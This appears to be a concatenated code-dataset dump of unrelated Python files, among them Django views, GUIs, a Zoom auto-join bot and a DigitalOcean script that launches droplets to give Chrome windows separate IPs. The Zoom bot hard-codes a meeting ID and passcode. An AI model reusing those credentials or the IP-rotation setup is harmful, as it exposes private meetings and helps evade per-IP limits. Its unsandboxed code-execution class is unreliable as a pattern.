return render(request, 'login.html', {"error": "your email is not correct"})
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
return redirect(main_page_view)
else:
return render(request, 'login.html', {"error": "user or password are incorrect"})
else:
return render(request, 'login.html', )
def logout_view(request):
logout(request)
return render(request, 'login.html', )
def signup_view(request):
if request.user.is_authenticated():
messages.warning(request, 'you allready loged in')
return redirect(main_page_view)
else:
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('password1')
user = authenticate(username=username, password=raw_password)
login(request, user)
messages.info(request, 'you have loged in')
return redirect(main_page_view)
else:
form = SignUpForm()
return render(request, 'signup.html', {'form': form})
@login_required(login_url='/blog/login/')
def main_page_view(request):
if request.method == 'POST' and request.user.is_authenticated():
title = request.POST.get('title')
text = request.POST.get('text')
Post.objects.create(author=request.user, title=title, text=text)
return HttpResponseRedirect('/blog')
else:
username = request.user.get_username()
posts = Post.objects.order_by('published_date').all()
return render(request, 'blog.html',
{
'posts': posts,
'userlogedin': True,
'username': username
})
@login_required(login_url='/blog/login/')
def post_view(request, pk):
post = Post.objects.get(id=pk)
username = request.user.get_username()
return render(request, 'post.html',
{
'post': post,
'userlogedin': True,
'username': username
})
|
21,580 | 295dc4630b427e54cf82d0e9b84536dae6c31dc1 | from tkinter import Tk, Label, PhotoImage
root = Tk() # the window
# transform GIF image to a format tkinter can display
photo = PhotoImage(file='peace.gif')
peace = Label(master=root,
image=photo,
width=300, # width of label, in pixels
height=180) # heigh of label, in pixels
peace.pack()
root.mainloop()
|
21,581 | d9654845debc7dba06b54dfe0521a872c2349a96 | #!/usr/bin/python
""" This Werkzeug server is used only for development and debugging """
import os, optparse, sys
from os.path import dirname, exists, join, isfile
import OpenSSL.SSL as ssl
import newhive.config as config
from newhive.app import application
from werkzeug.serving import run_simple, make_ssl_devcert
# caution, broken in some obscure way
#def wsgi_no_cache(app):
# def new_app(environ, start_response):
# def new_start_response(status, headers, **args):
# headers.append(('Cache-Control', 'no-cache, no-store, must-revalidate'))
# return start_response(status, headers, **args)
# return app(environ, new_start_response)
# return new_app
# undfortunately this doesn't work for static files
# (need to subclass the server for that), so use your own cache killing solution!
#if config.debug_mode: application = wsgi_no_cache(application)
def run_dev_server(http_only=False, threaded=False):
# version of SSL included by werkzeug from pip is broken. Use github
ssl_prefix = join(config.src_home, 'lib', 'tmp', 'ssl')
if not isfile(ssl_prefix + '.key'):
make_ssl_devcert(ssl_prefix, host='localhost', cn=None)
ssl_context = ssl.Context(ssl.SSLv23_METHOD)
ssl_context.use_certificate_file(ssl_prefix + '.crt')
ssl_context.use_privatekey_file(ssl_prefix + '.key')
# run_simple is not so simple
def run_hive(port, ssl=False):
run_simple(
'0.0.0.0'
, port
, application
, threaded = threaded
, use_reloader = True
, use_debugger = config.debug_mode
, use_evalex = config.debug_unsecure # from werkzeug.debug import DebuggedApplication
, static_files = { '/lib' : join(config.src_home, 'lib') }
, ssl_context = ssl_context if ssl else None
#, processes = 0
)
if config.always_secure:
run_hive(config.ssl_port, True)
elif http_only:
run_hive(config.plain_port)
else:
child = os.fork()
if(child):
run_hive(config.plain_port)
else:
run_hive(config.ssl_port, True)
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option("-p", "--port", action="store", type="int", dest="port")
parser.add_option("-s", "--secure-port", action="store", type="int", dest="secure_port",
help='Defaults to -p argument + 1 unless given --ssl-only')
parser.add_option("--ssl-only", action="store_true", dest="ssl_only", default=False)
parser.add_option("-1", "--plain-only", action="store_true", dest="plain_only", default=False)
parser.add_option("-d", "--debug", action="store_true", dest="debug")
parser.add_option("--secure", action="store_true", dest="secure", default=False)
parser.add_option("--threaded", action="store_true", dest="threaded", default=False)
(options, args) = parser.parse_args()
config.plain_port = options.port or config.plain_port
#config.ssl_port = options.secure_port or options.port if options.ssl_only else options.port + 1
config.always_secure = options.secure or config.always_secure
config.debug_mode = options.debug or config.debug_mode
config.webassets_debug = options.debug or config.webassets_debug
config.interactive = True
config.always_secure = options.secure or config.always_secure
config.threaded_dev_server = options.threaded or config.threaded_dev_server
run_dev_server(options.plain_only, config.threaded_dev_server) |
21,582 | 8a381e002922e3c59f7fd6e161d1c85520b2492e | # -*- coding: utf-8 -*-
"""
Created on Sun Oct 21 14:55:53 2018
@author: Admin
"""
import pandas as pd
import numpy as np
df_path = "C:\ASM exam\cds_spread5y_2001_2016.dta"
data = pd.io.stata.read_stata("C:\ASM exam\cds_spread5y_2001_2016.dta")
data.to_csv('my_stata_file.csv')
df = pd.read_csv('my_stata_file.csv')
print(df['gvkey'])
a = df.gvkey.unique()
np.savetxt('k1.txt', a,fmt='% 4d') ##saving gvkeys into text file
df1 = pd.read_csv('crsp.csv')
d3 = pd.merge(df, df1, on='gvkey') #merging based on gvkey
|
21,583 | cd181c347f14fe4ae4db2adcc88ced59c9949ea2 | #!/usr/bin/env python
import wx
import wx.aui
from views.PTModuleWindow import PTModuleWindow
from views.PTLoggerWindow import PTLoggerWindow
from views.PTSpecRepoFrame import PTSpecRepoFrame
from views.PTCodeRepoFrame import PTCodeRepoFrame
from views.PTEnvironmentFrame import PTEnvironmentFrame
from views.PTAddLocalModuleFrame import PTAddLocalModuleFrame
class PTFrame (wx.Frame):
mgr = None
moduleWindow = None
loggerWindow = None
sepcRepoFrame = None
codeRepoFrame = None
envFrame = None
localFrame = None
loggerBtn = None
def __init__(self):
super(PTFrame, self).__init__(None, wx.ID_ANY, u"iOS Develop Tools", size=(1000, 600))
self.SetupMenuBar()
self.SetupUI()
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.CentreOnScreen()
self.Show(True)
# self.OnDisplayLogger(None)
def SetupMenuBar(self):
addMenu = wx.Menu()
addLocalModuleItem = addMenu.Append(-1, "&Add Local Module...\tCtrl-A", "Add local module")
fileMenu = wx.Menu()
specRepoItem = fileMenu.Append(-1, "&Podspec Repo List...\tCtrl-P", "Show podspec repo list")
codeRepoItem = fileMenu.Append(-1, "&Code Repo List...\tCtrl-C", "Show code repo list")
fileMenu.AppendSeparator()
environmentItem = fileMenu.Append(-1, "&Commands...\tCtrl-E", "Show commands paths")
exitItem = fileMenu.Append(wx.ID_EXIT)
helpMenu = wx.Menu()
aboutItem = helpMenu.Append(wx.ID_ABOUT)
menuBar = wx.MenuBar()
menuBar.Append(addMenu, "&Add")
menuBar.Append(fileMenu, "&Configs")
menuBar.Append(helpMenu, "&Help")
self.SetMenuBar(menuBar)
self.Bind(wx.EVT_MENU, self.OnAddLocalModule, addLocalModuleItem)
self.Bind(wx.EVT_MENU, self.OnShowSpecRepoList, specRepoItem)
self.Bind(wx.EVT_MENU, self.OnShowCodeRepoList, codeRepoItem)
self.Bind(wx.EVT_MENU, self.OnShowCommands, environmentItem)
self.Bind(wx.EVT_MENU, self.OnExit, exitItem)
self.Bind(wx.EVT_MENU, self.OnAbout, aboutItem)
def OnAddLocalModule(self, event):
if self.localFrame == None:
self.localFrame = PTAddLocalModuleFrame(self, self.OnLogCallback, self.OnAddLocalModuelCallback, self.OnCloseAddLocalFrameCallback)
def OnCloseAddLocalFrameCallback(self):
self.localFrame = None
def OnAddLocalModuelCallback(self, module, isTrunk):
self.moduleWindow.OnAddModule(module, isTrunk)
def OnShowSpecRepoList(self, event):
if self.sepcRepoFrame == None:
self.sepcRepoFrame = PTSpecRepoFrame(self, self.OnLogCallback, self.OnCloseSpecRepoFrameCallback)
def OnCloseSpecRepoFrameCallback(self):
self.sepcRepoFrame = None
def OnShowCodeRepoList(self, event):
if self.codeRepoFrame == None:
self.codeRepoFrame = PTCodeRepoFrame(self, self.OnLogCallback, self.OnCloseCodeRepoFrameCallback)
def OnCloseCodeRepoFrameCallback(self):
self.codeRepoFrame = None
def OnShowCommands(self, event):
if self.envFrame == None:
self.envFrame = PTEnvironmentFrame(self, self.OnLogCallback, self.OnEnvFrameCallback)
def OnEnvFrameCallback(self):
self.envFrame = None
def OnExit(self, event):
self.Close(True)
def OnAbout(self, event):
wx.MessageBox("Nice to you.",
"Develop Tools",
wx.OK|wx.ICON_INFORMATION)
def OnClose(self, event):
self.mgr.UnInit()
self.Destroy()
def CreateContentWindow(self, panel):
contentWindow = wx.Window(panel)
self.mgr = wx.aui.AuiManager(contentWindow)
panel = wx.Panel(contentWindow)
topNotebook = wx.Notebook(panel, wx.ID_ANY)
self.moduleWindow = PTModuleWindow(topNotebook, self.OnLogCallback)
topNotebook.AddPage(self.moduleWindow, u"Module List")
topNotebook.SetSelection(0)
infoBox = wx.BoxSizer(wx.HORIZONTAL)
infoBox.Add(topNotebook, 1, wx.EXPAND)
panel.SetSizerAndFit(infoBox)
centrePane = wx.aui.AuiPaneInfo().CenterPane().Name("content").CloseButton(False)
self.mgr.AddPane(panel, centrePane)
panel2 = wx.Panel(contentWindow)
self.loggerWindow = PTLoggerWindow(panel2)
logBox = wx.BoxSizer(wx.HORIZONTAL)
logBox.Add(self.loggerWindow, 1, wx.EXPAND)
panel2.SetSizerAndFit(logBox)
leftPane = wx.aui.AuiPaneInfo().Left().Name("logger").CloseButton(False).MinSize((400, 600))
self.mgr.AddPane(panel2, leftPane)
self.mgr.Update()
return contentWindow
def CreateBottomWindow(self, panel):
bottomWindow = wx.Window(panel)
self.loggerBtn = wx.Button(bottomWindow, wx.ID_ANY, u"Hide Logger")
self.loggerBtn.Bind(wx.EVT_BUTTON, self.OnDisplayLogger)
hBox = wx.BoxSizer(wx.HORIZONTAL)
hBox.Add(self.loggerBtn, 0)
bottomWindow.SetSizerAndFit(hBox)
return bottomWindow
def OnDisplayLogger(self, event):
loggerPane = self.mgr.GetPane("logger")
isShown = loggerPane.IsShown()
if isShown == True:
self.loggerBtn.SetLabelText(u"Show Logger")
loggerPane.Hide()
else:
self.loggerBtn.SetLabelText(u"Hide Logger")
loggerPane.Show(True)
self.mgr.Update()
def SetupUI(self):
self.SetBackgroundColour(wx.WHITE)
panel = wx.Panel(self)
vBox = wx.BoxSizer(wx.VERTICAL)
vBox.Add(self.CreateContentWindow(panel), 1, wx.EXPAND)
vBox.Add(self.CreateBottomWindow(panel), 0, wx.EXPAND)
panel.SetSizerAndFit(vBox)
# Log callback
def OnLogCallback(self, message):
self.loggerWindow.AppendText(message) |
21,584 | c37aba9cfe8da27ed882a948773aeed370524ea2 | from helpers import assert_equality
def plot():
import matplotlib.cm as cm
import matplotlib.pyplot as plt
import numpy as np
x, y = np.meshgrid(np.linspace(0, 1), np.linspace(0, 1))
z = x ** 2 - y ** 2
fig = plt.figure()
plt.pcolormesh(x, y, z, cmap=cm.viridis, shading="gouraud")
return fig
def test():
assert_equality(plot, __file__[:-3] + "_reference.tex", flavor="context")
return
|
21,585 | b09ce47a6fb5ab88eddc2be33a90ca7c51dfdc79 | # Challenge: https://www.hackerrank.com/challenges/python-print/problem?h_r=next-challenge&h_v=zen
num = int(input())
for i in range(1,num+1):
print(i,end="") |
21,586 | de096d77104d5f67af00aa3592d5f2517f01ccf5 | #-*- coding:utf-8 -*-
#!Author:YunFei Zhang
'''
定义
关键字 函数名(参数):
"文档描述"
过程
返回值
'''
#函数
'''
def func1():
"""testing1"""
return 0
'''
#过程
'''
def func2():
"""testing2"""
print("in the func2")
'''
'''
递归定义:在函数内部,可以调用其他函数。如果一个函数在内部调用自身,这个函数就是递归函数。
特性:1、必须要有一个明确的结束条件。
2、每次进入更深一层递归时,问题规模相比上次递归都应该有所减少
3、递归效率不高,递归层次过多会导致栈溢出(计算机中,函数调用时通过栈这种数据结构实现的,每当一如一个函数调用,
栈就会加一层栈帧。每当函数返回,栈就会减一层栈帧。由于栈的大小不是无限的,所以,递归调用的次数过多,会导致栈溢
出。)
'''
'''
def clac(n):
print(n)
if int(n/2) > 0:
return clac(int(n / 2))
clac(10)
'''
#高阶函数:变量可以指向函数,函数的参数能接受变量,那么一个函数就可以接受另一个函数作为参数,这种函数就称之为高阶函数
def add(a, b, f):
return f(a) + f(b)
print(add(3, -6, abs))#abs为内置函数 |
21,587 | 3b227bdf54355e337939a98dab3fb8574798a697 | #!/usr/bin/python3
"""Module that reads stdin line by line and print metrics"""
import sys
if __name__ == "__main__":
stat = {"200": 0, "301": 0, "400": 0, "401": 0,
"403": 0, "404": 0, "405": 0, "500": 0}
ctr = 0
total_size = 0
try:
for line in sys.stdin:
status_code = line.split('"')[2].split(" ")[1]
size = int(line.split('"')[2].split(" ")[2])
total_size += size
ctr += 1
for key in sorted(stat.keys()):
if status_code == key:
stat[key] += 1
if ctr == 10:
print("File size: {:d}".format(total_size))
for key in sorted(stat.keys()):
if stat[key]:
print("{}: {:d}".format(key, stat[key]))
ctr = 0
except KeyboardInterrupt:
pass
finally:
print("File size: {:d}".format(total_size))
for key in sorted(stat.keys()):
if stat[key]:
print("{}: {:d}".format(key, stat[key]))
|
21,588 | 642caf099e41e964cf15caa418d4da50cd7beabc | import sys
from io import StringIO
import threading
import time
from code import InteractiveInterpreter
def execute(interpreter: InteractiveInterpreter, code):
old_stdout, old_stderr = sys.stdout, sys.stderr
redirected_output = sys.stdout = StringIO()
redirected_error = sys.stderr = StringIO()
interpreter.runcode(code)
sys.stdout, sys.stderr = old_stdout, old_stdout
return {'output': redirected_output.getvalue(), 'error': redirected_error.getvalue()}
clients = {}
class Client(threading.Thread):
def __init__(self, queue: list, id):
super().__init__()
self.id = id
self.queue = queue
self.result = []
variables = globals().copy()
variables.update(locals())
self.interpreter = InteractiveInterpreter(variables)
self.stop = False
self.loading = False
def run(self):
self.interpreter.runcode("__name__ = '__main__'")
while True:
while len(self.queue) > 0:
self.loading = True
code = self.queue.pop(0)
self.result.append(execute(self.interpreter, code))
self.loading = False
time.sleep(1)
if self.stop:
break
def push_code(self, code):
self.queue.append(code)
def get_result(self):
while len(self.result) <= 0:
pass
result = self.result.pop(0)
return result
def close_client(self):
self.stop = True
class IDError(Exception):
def __init__(self, error):
super().__init__(self)
self.error = error
pass
def __repr__(self):
return self.error
def __str__(self):
return self.error
|
21,589 | 70c5628ba9e2ce88de3d4b83dfc809e27a4bd237 | import math
from collections import Counter
def entropy(class_probabilities):
return sum(
-probability * math.log(probability, 2)
for probability
in class_probabilities
if probability
)
# DATA WILL COME IN THE FORM (input, label)
def class_probabilities(labels):
total_count = len(labels)
return [
count / total_count
for count
in Counter(labels).values()
]
def data_entropy(labeled_data):
labels = [ label for _, label in labeled_data ]
probabilities = class_probabilities(labels)
return entropy(probabilities)
def partition_entropy(subsets): # subsets is a list of lists
total_count = sum ( len(subset) for subset in subsets )
return sum (
data_entropy(subset) * len(subset) / total_count
for subset
in subsets
)
|
21,590 | 43084d5b0f7d1ec4f78fa5336bd39128909b9e1c | import networkx as nx
'''
Joints
------
0: BODY_COXA, :15
1: COXA_FEMUR, :16
2: FEMUR_TIBIA, :17
3: TIBIA_TARSUS, :18
4: TARSUS_TIP, :19
5: BODY_COXA, :20
6: COXA_FEMUR, :21
7: FEMUR_TIBIA, :22
8: TIBIA_TARSUS, :23
9: TARSUS_TIP, :24
10: BODY_COXA, :25
11: COXA_FEMUR, :26
12: FEMUR_TIBIA, :27
13: TIBIA_TARSUS, :28
14: TARSUS_TIP, :29
'''
def skeleton():
edges = [(0,1),(1,2),(2,3),(3,4),
(5,6),(6,7),(7,8),(8,9),
(10,11),(11,12),(12,13),(13,14),
(15,16),(16,17),(17,18),(18,19),
(20,21),(21,22),(22,23),(23,24),
(25,26),(26,27),(27,28),(28,29)]
#0: LF, 1: LM, 2: LH, 3: RF, 4: RM, 5: RH,
limb_id = [i for i in range(6) for j in range(5)]
nodes = [i for i in range(30)]
colors = [[186,30,49], [201,86,79], [213,133,121], #RF, RM, RH
[15,115, 153], [26,141, 175], [117,190,203] #LF, LM, LH
]
edge_colors = [[x / 255.0 for x in colors[i]] for i in limb_id]
#build graph
G=nx.Graph()
G.add_edges_from(edges)
G.add_nodes_from(nodes)
return G, edge_colors |
21,591 | 6be91a455a2f5d9bdd18c68b3e396bda1efefe15 | bl_info = {
"name": "Animation Markers Exporter For Urho3D",
"author": "codingmonkey",
"category": "Object",
"blender": (2, 73, 1)
}
import bpy
import os
import struct
import sys
import mathutils
from math import radians
from bpy.props import (BoolProperty)
class MarkersExporter(bpy.types.Operator):
bl_idname = "object.markersexporter" # unique identifier for buttons and menu items to reference.
bl_label = "Urho3D Markers Create" # display name in the interface.
bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.
normalizeMarkers = BoolProperty( name="Normalize markers", description="Normalize markers", default=False )
def SaveLocalActionMarkes(self, context):
print ("Actions count:", len(bpy.data.actions));
fps = context.scene.render.fps
print ("render fps:{0}".format(fps))
for i, action in enumerate(bpy.data.actions):
print ("index: {0} action name: {1} have {2} markers".format(i, action.name, len(action.pose_markers)))
print ("frame range {0} to {1}".format(action.frame_range[0], action.frame_range[1]))
print ("action len {0}".format(action.frame_range[1] - action.frame_range[0]))
startFrame = action.frame_range[0]
endFrame = action.frame_range[1]
lenAction = endFrame - startFrame
isThisActionHasMarkers = len(action.pose_markers)
if (isThisActionHasMarkers):
# markers write
file = open(action.name + ".xml", 'wt')
file.write("<animation>\n")
for i, marker in enumerate(action.pose_markers):
if (self.normalizeMarkers == False):
print ("marker index: {0} frame: {1} name: {2}".format(i, marker.frame, marker.name))
file.write(' <trigger time="{0:.2f}" type="String" value="{1}" />\n'.format(marker.frame / fps, marker.name))
else:
print ("marker index: {0} normalizedtime: {1} name: {2}".format(i, marker.frame / lenAction, marker.name))
file.write(' <trigger normalizedtime="{0:.2f}" type="String" value="{1}" />\n'.format(marker.frame / lenAction, marker.name))
file.write("</animation>")
file.close()
def SaveGlobalSceneMarkers(self, context):
isSceneHasMarkers = len(context.scene.timeline_markers)
scene = context.scene
fps = scene.render.fps
lenScene = scene.frame_end
if (isSceneHasMarkers):
file = open(scene.name + "_global_markers.xml", 'wt')
file.write("<animation>\n")
for i, marker in enumerate(scene.timeline_markers):
if (self.normalizeMarkers == False):
file.write(' <trigger time="{0:.2f}" type="String" value="{1}" />\n'.format(marker.frame / fps, marker.name))
else:
file.write(' <trigger normalizedtime="{0:.2f}" type="String" value="{1}" />\n'.format(marker.frame / lenScene, marker.name))
file.write("</animation>")
file.close()
def execute(self, context):
self.SaveLocalActionMarkes(context)
self.SaveGlobalSceneMarkers(context)
return {'FINISHED'}
def menu_func(self, context):
self.layout.operator(MarkersExporter.bl_idname)
def register():
bpy.utils.register_class(MarkersExporter)
bpy.types.VIEW3D_MT_object.append(menu_func)
def unregister():
bpy.utils.unregister_class(MarkersExporter) |
21,592 | 8d2eea677bc8d36184d7892e81acccabb6717c02 | from django.contrib.auth import views as auth_views
from django.urls import path, re_path
from . import views
app_name = 'chinesseRestaurant'
urlpatterns = [
path('', views.covidWarning, name='covidWarning'),
re_path('home/', views.home, name='home'),
path('customerView/', views.customerView, name='customerView'),
# path('signup/', views.signup, name='signup'),
path('register/', views.register, name='register'),
path('login/', auth_views.LoginView.as_view(), name='user_login'),
path('logout/', auth_views.LogoutView.as_view(), name='logout'),
path('foods/', views.item_list, name='item_list'),
path('foods/<slug:category_slug>/', views.item_list,
name='item_list'),
path('orderNow/', views.order_now, name='order_now'),
path('menu/', views.menu, name='menu'),
path('edit/', views.edit, name='edit'),
path('edit_delivery', views.editDeliveryPref, name="editDeliveryPref"),
]
|
21,593 | 9e677a0b1c0352e7adf3a364d8785bc1db8d765f | """
Automatic Zoom Hosting
Raymond Hernandez
December 25, 2020
"""
import os
import cv2
import pyautogui
import time
import schedule
import sys
from gui import *
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QApplication
# TODO: Make this list imported from a file
meeting_ID = ["test_ID", "82807141026"]
password = ["test_pass", "120628"]
index = 0
class GUI(QtWidgets.QMainWindow, Ui_MainWindow):
def __init__(self, parent=None):
super(GUI, self).__init__(parent)
self.setupUi(self)
self.start_host.clicked.connect(self.start_auto_host)
self.start_join.clicked.connect(self.start_auto_join)
def start_auto_host(self):
self.label_3.setText("Auto-host mode started...")
new_meetings_schedule()
def start_auto_join(self):
self.label_3.setText("Auto-join mode started...")
join_meetings_schedule()
class AutoZoom:
def __init__(self, ID=None, passcode=None, duration=None):
self.duration = duration
self.meeting_ID = ID
self.password = passcode
def start_meeting(self):
time.sleep(0.2)
pyautogui.press('esc', interval=0.1)
time.sleep(0.3)
pyautogui.press('win', interval=0.5)
pyautogui.write('zoom')
time.sleep(1)
pyautogui.press('enter', interval=0.5)
time.sleep(1)
# Press "New Meeting"
img = cv2.imread(r"button_new_meeting.PNG")
x, y = pyautogui.locateCenterOnScreen(img, confidence=0.9)
pyautogui.click(x, y)
pyautogui.press('enter', interval=10)
# Press "Participants"
img = cv2.imread(r"button_participants.PNG")
x, y = pyautogui.locateCenterOnScreen(img, confidence=0.9)
pyautogui.click(x, y)
pyautogui.press('enter', interval=2)
# Press "More Options"
img = cv2.imread(r"button_more_options.PNG")
x, y = pyautogui.locateCenterOnScreen(img, confidence=0.9)
pyautogui.click(x, y)
pyautogui.press('enter', interval=2)
# Press "Disable Waiting Room"
img = cv2.imread(r"button_waiting_room.PNG")
x, y = pyautogui.locateCenterOnScreen(img, confidence=0.9)
pyautogui.click(x, y)
pyautogui.press('enter', interval=.5)
# Press "More Options"
img = cv2.imread(r"button_more_options.PNG")
x, y = pyautogui.locateCenterOnScreen(img, confidence=0.9)
pyautogui.click(x, y)
pyautogui.press('enter', interval=.5)
# Press "Mute All"
img = cv2.imread(r"button_mute_all.PNG")
x, y = pyautogui.locateCenterOnScreen(img, confidence=0.9)
pyautogui.click(x, y)
pyautogui.press('enter', interval=.5)
# Ending the meeting
time.sleep(self.duration * 60)
os.system("TASKKILL /F /IM Zoom.exe")
time.sleep(0.5)
def join_meeting(self):
time.sleep(0.2)
pyautogui.press('esc', interval=0.1)
time.sleep(0.3)
pyautogui.press('win', interval=0.5)
pyautogui.write('zoom')
time.sleep(1)
pyautogui.press('enter', interval=0.5)
time.sleep(1)
# Press "Join Meeting"
img = cv2.imread(r"button_join.PNG")
x, y = pyautogui.locateCenterOnScreen(img, confidence=0.9)
pyautogui.click(x, y)
pyautogui.press('enter', interval=2)
pyautogui.write(self.meeting_ID)
pyautogui.press('enter', interval=2)
pyautogui.write(self.password)
pyautogui.press('enter', interval=2)
# Ending the meeting
time.sleep(self.duration * 60)
os.system("TASKKILL /F /IM Zoom.exe")
time.sleep(0.5)
def new_meetings_schedule():
zoom = AutoZoom(duration=200)
"""" Enable this to test """
zoom.start_meeting()
""" Real schedule here... """
schedule.every().tuesday.at("09:00").do(zoom.start_meeting)
schedule.every().wednesday.at("09:00").do(zoom.start_meeting)
schedule.every().thursday.at("09:00").do(zoom.start_meeting)
schedule.every().sunday.at("09:00").do(zoom.start_meeting)
while True:
schedule.run_pending()
time.sleep(1)
def join_meetings_schedule():
zoom = AutoZoom(ID=meeting_ID[index], passcode=password[index], duration=140)
""" Enable this to test or when using in GUI """
zoom.join_meeting()
""" Real schedule here... """
schedule.every().friday.at("18:30").do(zoom.join_meeting)
schedule.every().saturday.at("09:30").do(zoom.join_meeting)
schedule.every().sunday.at("15:30").do(zoom.join_meeting)
while True:
schedule.run_pending()
time.sleep(1)
def main():
# new_meetings_schedule()
join_meetings_schedule()
# app = QApplication(sys.argv)
# form = GUI()
# form.show()
# app.exec_()
if __name__ == "__main__":
main()
|
21,594 | 376b64aa60b4c79801ad79c7fdcdc97dc782ad20 | # Copyright (c) 2022, NVIDIA CORPORATION. All rights reserved.
""" Optimizer related helpers. """
from copy import deepcopy
from dataclasses import replace
from itertools import chain
from typing import Dict, List, Iterable
import torch
from .mapping import StateDict, ShardedStateDict, ShardedTensor, \
LocalNonpersitentObject
from .dict_utils import nested_values
def get_optim_param_to_id_map(optim_params_iter: Iterable[torch.nn.Parameter]) -> Dict[int, int]:
param_mappings = {}
for i, param in enumerate(optim_params_iter):
if id(param) not in param_mappings:
param_mappings[id(param)] = i
return param_mappings
def get_param_id_to_sharded_param_map(model_sharded_state_dict: ShardedStateDict,
optim_params_iter: Iterable[torch.nn.Parameter]) -> Dict[int, ShardedTensor]:
sharded_params = nested_values(model_sharded_state_dict)
id_to_sharded_param_map = {}
param_to_id_map = get_optim_param_to_id_map(optim_params_iter)
for ten in sharded_params:
if id(ten.data) in param_to_id_map:
id_to_sharded_param_map[param_to_id_map[id(ten.data)]] = ten
return id_to_sharded_param_map
def make_sharded_optimizer_tensor(model_param: ShardedTensor, optim_param: torch.Tensor, prefix: str) -> ShardedTensor:
assert tuple(optim_param.shape) == model_param.local_shape, \
f'Optimizer shape ({tuple(optim_param.shape)} does not match model shape ({model_param.local_shape})'
return replace(model_param, key=f'{prefix}.{model_param.key}', data=optim_param, dtype=optim_param.dtype)
def optim_state_to_sharding_state(optim_state_dict: StateDict, id_to_sharded_param_map: Dict[int, ShardedTensor]):
sharded_state = {}
for param_id, param_state in optim_state_dict['state'].items():
sharded_state[param_id] = {}
for state_key, param in param_state.items():
if param_id in id_to_sharded_param_map:
sharded_state[param_id][state_key] = make_sharded_optimizer_tensor(
id_to_sharded_param_map[param_id], param,
prefix=f'optimizer.state.{state_key}')
else:
raise ValueError(
f'Param id {param_id} does not match any model sharded param')
optim_state_dict['param_groups'] = deepcopy(optim_state_dict['param_groups'])
for group in optim_state_dict['param_groups']:
group['params'] = LocalNonpersitentObject(group['params'])
optim_state_dict['state'] = sharded_state
|
21,595 | ca4b81a0f97de53dfe0414249c2205b55e90b8c7 | import cgi
import datetime
import logging
import StringIO
import time
from google.appengine.ext import db
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.api import memcache
from google.appengine.api import images
logging.getLogger().setLevel(logging.DEBUG)
class Greeting(db.Model):
author = db.UserProperty()
content = db.StringProperty(multiline=True)
avatar = db.BlobProperty()
date = db.DateTimeProperty(auto_now_add=True)
class MainPage(webapp.RequestHandler):
def get(self):
self.response.out.write("<html><body>")
before = time.time()
greetings = self.get_greetings()
after = time.time()
timeTaken = str(after - before)
stats = memcache.get_stats()
self.response.out.write("<b>Time to get Greetings:%s seconds</b><br>" % timeTaken)
self.response.out.write("<b>Cache Hits:%s</b><br>" % stats['hits'])
self.response.out.write("<b>Cache Misses:%s</b><br><br>" %
stats['misses'])
self.response.out.write(greetings)
self.response.out.write("""
<form action="/sign" enctype="multipart/form-data" method="post">
<div><label>Message:</label></div>
<div><textarea name="content" rows="3" cols="60"></textarea></div>
<div><label>Avatar:</label></div>
<div><input type="file" name="img"/></div>
<div><input type="submit" value="Sign Guestbook"></div>
</form>
</body>
</html>""")
def get_greetings(self):
"""
get_greetings()
Checks the cache to see if there are cached greetings.
If not, call render_greetings and set the cache
Returns:
A string of HTML containing greetings.
"""
greetings = memcache.get("greetings")
if greetings is not None:
return greetings
else:
greetings = self.render_greetings()
if not memcache.add("greetings", greetings, 10):
logging.error("Memcache set failed.")
return greetings
def render_greetings(self):
"""
render_greetings()
Queries the database for greetings, iterate through the
results and create the HTML.
Returns:
A string of HTML containing greetings
"""
results = db.GqlQuery("SELECT * "
"FROM Greeting "
"ORDER BY date DESC").fetch(10)
output = StringIO.StringIO()
for result in results:
if result.author:
output.write("<b>%s</b> wrote:" % result.author.nickname())
else:
output.write("An anonymous person wrote:")
output.write("<div><img src='img?img_id=%s'></img>" %
result.key())
output.write(' %s</div>' % cgi.escape(result.content))
return output.getvalue()
class Image (webapp.RequestHandler):
def get(self):
greeting = db.get(self.request.get("img_id"))
if greeting.avatar:
self.response.headers['Content-Type'] = "image/png"
self.response.out.write(greeting.avatar)
else:
self.response.out.write("No image")
class Guestbook(webapp.RequestHandler):
def post(self):
greeting = Greeting()
if users.get_current_user():
greeting.author = users.get_current_user()
greeting.content = self.request.get('content')
if self.request.get("img"):
avatar = images.resize(self.request.get("img"), 32, 32)
greeting.avatar = db.Blob(avatar)
greeting.put()
self.redirect('/')
application = webapp.WSGIApplication([
('/', MainPage),
('/img', Image),
('/sign', Guestbook)
], debug=True)
def main():
run_wsgi_app(application)
if __name__ == '__main__':
main()
|
21,596 | ec45b39ff09433164cab8a11a0bf8885e3740490 | #!/usr/bin/python
import urllib2
import json
import sys
import time
import subprocess
import os
import binascii
# Launches specified number of Digital Ocean droplets and binds one Chrome instance to each droplet,
# resulting in any number of separate windows (up to a reasonable limit) with different IPs.
# Requires a corresponding image on your DO account that starts a SOCKS proxy on boot (the script
# assumes this). Please do not use for anything malicious or illegal, this was made for testing a
# P2P messaging application.
if len(sys.argv) < 2:
print "\tPlease specify a number of proxies to launch:"
print "\t./launch #"
print "\t Exiting."
exit(1)
droplets = int(sys.argv[1])
client_id = "YOUR ID"
api_key = "YOUR KEY"
print "DigitalOcean Client ID: " + client_id
print "DigitalOcean API key: " + api_key
image_id = "YOUR IMAGE ID"
size_id = "66"
sshkey_id = "YOUR SSH KEY ID"
region_slug = "nyc2"
# Create a random group ID so that we can launch multiple groups of droplets
group = binascii.b2a_hex(os.urandom(8))
for x in range(1,droplets+1):
name = "P" + str(x) + "x" + group
api_string = ("https://api.digitalocean.com/droplets/new?" +
"client_id={0}&api_key={1}&name={2}&size_id={3}&image_id={4}®ion_slug={5}&ssh_key_ids={6}"
.format(client_id, api_key, name, size_id, image_id, region_slug, sshkey_id))
launch = urllib2.urlopen(api_string)
response = json.load(launch)
print "Sent request for proxy " + str(x) + "... " + response['status']
if response['status'] == "ERROR":
print "Uh oh, something went wrong. Printing response from API and exiting."
print response
exit(1)
# Wait between GETs to prevent rate limiting
time.sleep(3)
print "Now waiting for all proxies to finish booting. This will take 3 minutes."
time.sleep(60)
print "120 seconds left..."
time.sleep(60)
print "60 seconds left..."
time.sleep(60)
print "All proxies should now be initialized."
